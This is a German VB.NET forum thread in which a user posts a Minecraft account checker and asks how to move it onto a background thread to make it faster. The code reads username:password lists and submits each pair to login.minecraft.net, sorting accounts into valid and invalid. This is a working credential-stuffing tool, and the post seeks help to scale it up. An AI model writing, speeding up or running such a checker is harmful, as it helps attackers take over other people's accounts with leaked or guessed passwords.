Aus anderem Thread auf Form zugreifen

  • VB.NET

Es gibt 4 Antworten in diesem Thema. Der letzte Beitrag () ist von Kangaroo.

    Aus anderem Thread auf Form zugreifen

    Hallo Com.
    Ich habe folgendes Problem Ich habe diesen Source der in einem anderen Thread liegt aber so funktioniert er nicht da ich nicht ohne weiteres auf die Form zugreifen kann :

    VB.NET-Quellcode

    1. Number = 0
    2. valid = 0
    3. invalid = 0
    4. For i As Integer = 0 To RichTextBox1.Lines.Length - 1
    5. Number = Number + 1
    6. Next
    7. For i As Integer = 0 To RichTextBox1.Lines.Length - 1
    8. If RichTextBox1.Lines(i).Contains(":") Then
    9. Dim Username As String = RichTextBox1.Lines(i).Split(":")(0)
    10. Dim Password As String = RichTextBox1.Lines(i).Split(":")(1)
    11. Using wc As New System.Net.WebClient
    12. Dim response As String = wc.DownloadString("http://login.minecraft.net/?user=" & Username & "&" & "password=" & Password & "&version=14")
    13. If response.Contains("Bad login") Then
    14. ListBox1.Items.Add(Username & ":" & Password & " - " & "invalid")
    15. invalid = invalid + 1
    16. Label1.Text = ("Accounts - " & invalid & " Invalid ; " & valid & " Valid")
    17. Else
    18. ListBox1.Items.Add(Username & ":" & Password & " - " & " Valid")
    19. valid = valid + 1
    20. Label1.Text = "Accounts - " & invalid & " Invalid ; " & valid & " Valid"
    21. End If
    22. End Using
    23. Else
    24. End If
    25. Next


    Nun dauert dieser Vorgang aber sehr lange , nun habe ich gedacht ich versuch es mal mit "Threading" aber ich komm nicht mehr Klar .....

    Lg Graphic
    @Kangaroo: Was hast Du denn da für einen augenkrebs verursachenden Font drinnen?
    Falls Du diesen Code kopierst, achte auf die C&P-Bremse.
    Jede einzelne Zeile Deines Programms, die Du nicht explizit getestet hast, ist falsch :!:
    Ein guter .NET-Snippetkonverter (der ist verfügbar).
    Programmierfragen über PN / Konversation werden ignoriert!